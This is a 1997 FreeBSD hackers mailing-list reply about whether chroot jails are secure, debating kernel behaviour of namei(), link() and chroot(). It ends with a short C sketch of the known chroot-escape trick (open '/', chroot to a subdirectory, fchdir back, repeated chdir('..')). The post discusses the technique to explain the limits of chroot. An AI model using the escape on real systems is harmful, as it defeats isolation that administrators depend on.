From owner-freebsd-hackers Thu May 29 08:17:52 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA19106 for hackers-outgoing; Thu, 29 May 1997 08:17:52 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id IAA19101 for ; Thu, 29 May 1997 08:17:45 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 1.60 #1) id 0wX6vy-0002fp-00; Thu, 29 May 1997 09:16:10 -0600 To: Terry Lambert Subject: Re: Correct way to chroot for shell account users? Cc: dec@phoenix.its.rpi.edu, peter@grendel.IAEhv.nl, mrcpu@cdsnet.net, hackers@freebsd.org In-reply-to: Your message of "Thu, 29 May 1997 07:56:26 PDT." <199705291456.HAA03526@phaeton.artisoft.com> References: <199705291456.HAA03526@phaeton.artisoft.com> Date: Thu, 29 May 1997 09:16:10 -0600 From: Warner Losh Message-Id: Sender: owner-hackers@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199705291456.HAA03526@phaeton.artisoft.com> Terry Lambert writes: : 1) namei() refusing to traverse ".." from the chroot'ed : root vnode (this is broken, but then almost all of : namei() is broken, and no one cares but me...). This works because the .. is outside the jail. : 2) The chroot() call takes a path, which namei() will : look up relative Yes. That's true but irrelevant. : 3) The link() system call in /sys/kern/vfs_syscalls.c has : code to prevent hard links on directories: : : if (vp->v_type == VDIR) : error = EPERM; /* POSIX */ : : Not even root can do the hard link your method requires. Right, that's what I said, but this is new. : 4) You don't have to let them have an open fd to the original : "/" when you throw them in jail. Ummm, the "/" I was talking about was the new root (eg /jail in the non-chroot'd system). You open up /, keep that fd around, then chroot to someplace else lower in your current tree (eg /jail/xxx in the non-chrooted case, or /xxx in the chroot'd case). At this point the fchdir would succeed in landing you outside the jail. : 5) Calling chroot(2) is restricted to the superuser anyway, : and only an idiot would try to put a root user in a : chroot jail anyway (or put an ordinary user in a chroot : jail with suid/sgid binaries). 100% correct. However, many people think that a chroot'd environment is so safe that even root can't climb out. It isn't. If somehow a user gets root in a chroot'd environment, then your entire machine can be comporomised. Michael Smith posted the program to climb out of the jail here a few months ago. This isn't theoretical, but it works. It was something along the lines of the following. You can find it in the archives. int main() { int fd; mkdir("xxx"); fd = open("/"); chroot("/xxx"); fchdir(fd); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); }